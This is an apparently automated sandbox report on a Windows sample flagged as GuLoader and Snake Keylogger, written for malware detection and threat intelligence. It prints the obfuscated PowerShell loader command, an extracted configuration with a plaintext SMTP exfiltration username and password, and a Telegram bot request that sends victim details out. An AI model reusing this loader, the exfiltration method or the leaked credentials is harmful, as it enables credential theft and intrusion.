Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NDQ211216GM08.exe.bin.exe

Overview

General Information

Sample name:NDQ211216GM08.exe.bin.exe
Analysis ID:1637274
MD5:cfdb222e894ea0d5fe9557aae2e0adf3
SHA1:cc01954d759cce12e827be5b1443d5702ebc779d
SHA256:d7798f6bb9a86bb1f5c9d5633015951425439cad729cc2411ff092ae654620be
Tags:exeuser-TornadoAV_dev
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • NDQ211216GM08.exe.bin.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe" MD5: CFDB222E894EA0D5FE9557AAE2E0ADF3)
    • powershell.exe (PID: 6456 cmdline: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Nonalined.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\Nonalined.exe" MD5: CFDB222E894EA0D5FE9557AAE2E0ADF3)
  • svchost.exe (PID: 2540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Nonalined.exe PID: 5156JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Nonalined.exe PID: 5156JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", CommandLine: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe, ParentProcessId: 6348, ParentProcessName: NDQ211216GM08.exe.bin.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)", ProcessId: 6456, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2540, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T13:34:40.092454+010028033053Unknown Traffic192.168.2.949698104.21.80.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T13:34:35.136983+010028032742Potentially Bad Traffic192.168.2.949695193.122.130.080TCP
          2025-03-13T13:34:37.554267+010028032742Potentially Bad Traffic192.168.2.949695193.122.130.080TCP
          2025-03-13T13:34:40.601127+010028032742Potentially Bad Traffic192.168.2.949699193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T13:34:28.277829+010028032702Potentially Bad Traffic192.168.2.949693142.250.74.206443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T13:35:03.517398+010018100071Potentially Bad Traffic192.168.2.949713149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: NDQ211216GM08.exe.bin.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeAvira: detection malicious, Label: TR/Injector.wdfal
          Found malware configuration
          Source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeReversingLabs: Detection: 63%
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeVirustotal: Detection: 63%Perma Link
          Multi AV Scanner detection for submitted file
          Source: NDQ211216GM08.exe.bin.exeVirustotal: Detection: 63%Perma Link
          Source: NDQ211216GM08.exe.bin.exeReversingLabs: Detection: 63%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234187A8 CryptUnprotectData,11_2_234187A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23418EF1 CryptUnprotectData,11_2_23418EF1
          Source: NDQ211216GM08.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
          Source: NDQ211216GM08.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040290B FindFirstFileW,11_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C13
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040683D FindFirstFileW,FindClose,11_2_0040683D
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 0015F45Dh11_2_0015F2C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 0015F45Dh11_2_0015F4AC
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 0015FC19h11_2_0015F974
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 22413308h11_2_22412EF0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 22412D41h11_2_22412A90
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241EA79h11_2_2241E7D0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241D919h11_2_2241D670
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241D4C1h11_2_2241D218
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 22413308h11_2_22413236
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241DD71h11_2_2241DAC8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 22413308h11_2_22412EEA
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241E621h11_2_2241E378
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241E1C9h11_2_2241DF20
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 22410D0Dh11_2_22410B30
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 224116F8h11_2_22410B30
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_22410040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241EED1h11_2_2241EC28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241F781h11_2_2241F4D8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241F329h11_2_2241F080
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241FBD9h11_2_2241F930
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2241D069h11_2_2241CDC0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23417EB5h11_2_23417B78
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23419280h11_2_23418FB0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341DEFFh11_2_2341DC30
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23415179h11_2_23414ED0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23410FF1h11_2_23410D48
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341E81Fh11_2_2341E550
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23412A01h11_2_23412758
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341C82Fh11_2_2341C560
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341A83Fh11_2_2341A570
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234125A9h11_2_23412300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341F5CFh11_2_2341F300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341D5DFh11_2_2341D310
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234179C9h11_2_23417720
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341B5EFh11_2_2341B320
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234155D1h11_2_23415328
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23419A8Fh11_2_234197C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23415E81h11_2_23415BD8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341ECAFh11_2_2341E9E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341CCBFh11_2_2341C9F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234118A1h11_2_234115F8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23415A29h11_2_23415780
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341FA5Fh11_2_2341F790
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341DA6Fh11_2_2341D7A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23411449h11_2_234111A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341BA7Fh11_2_2341B7B0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23412E59h11_2_23412BB0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234102E9h11_2_23410040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341BF0Fh11_2_2341BC40
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23411CF9h11_2_23411A50
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23419F1Fh11_2_23419C50
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23413709h11_2_23413460
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23417119h11_2_23416E70
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341F13Fh11_2_2341EE70
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23414D21h11_2_23414A78
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341ACCFh11_2_2341AA00
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234132B1h11_2_23413008
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23416CC1h11_2_23416A18
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234148C9h11_2_23414620
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234162D9h11_2_23416030
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341E38Fh11_2_2341E0C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23417571h11_2_234172C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341C39Fh11_2_2341C0D0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341A3AFh11_2_2341A0E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23410B99h11_2_234108F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341D14Fh11_2_2341CE80
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23416733h11_2_23416488
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2341B15Fh11_2_2341AE90
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23410741h11_2_23410498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23412151h11_2_23411EA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234847E8h11_2_23484478
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23489B10h11_2_23489818
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348F5E8h11_2_2348F2F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23484E90h11_2_23484B98
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23481517h11_2_23481248
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23486B40h11_2_23486848
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234802E7h11_2_23480040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348D938h11_2_2348D640
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23483E27h11_2_23483B58
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348C150h11_2_2348BE58
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23489648h11_2_23489350
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23481E37h11_2_23481B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23487E60h11_2_23487B68
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23485358h11_2_23485060
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348EC59h11_2_2348E960
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348D470h11_2_2348D178
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348A968h11_2_2348A670
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348DE00h11_2_2348DB08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348B2F8h11_2_2348B000
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23482BE7h11_2_23482918
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23487008h11_2_23486D10
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23480BF7h11_2_23480928
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23485820h11_2_23485528
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348F120h11_2_2348EE28
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348C618h11_2_2348C320
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23483507h11_2_23483238
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348AE30h11_2_2348AB38
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23488328h11_2_23488030
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23483997h11_2_234836C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348B7C0h11_2_2348B4C8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23488CB8h11_2_234889C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234819A7h11_2_234816D8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234874D0h11_2_234871D8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348E2C8h11_2_2348DFD0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234842B7h11_2_23483FE8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348CAE0h11_2_2348C7E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23489FD8h11_2_23489CE0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234822C7h11_2_23481FF8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234887F0h11_2_234884F8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23485CE8h11_2_234859F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23482757h11_2_23482488
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23489180h11_2_23488E88
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23486678h11_2_23486380
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23480767h11_2_23480498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348E790h11_2_2348E498
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348BC88h11_2_2348B990
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23483078h11_2_23482DA8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348A4A0h11_2_2348A1A8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23487998h11_2_234876A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 23481087h11_2_23480DB8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234861B0h11_2_23485EB8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348FAB0h11_2_2348F7B8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 2348CFA8h11_2_2348CCB0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234AF1CB
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234AF1C7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234AF1BF
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234AF1BD
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234AF228
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234B0800h11_2_234B0508
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then jmp 234B0338h11_2_234B0040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_234E2A80

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49713 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
          Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
          Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
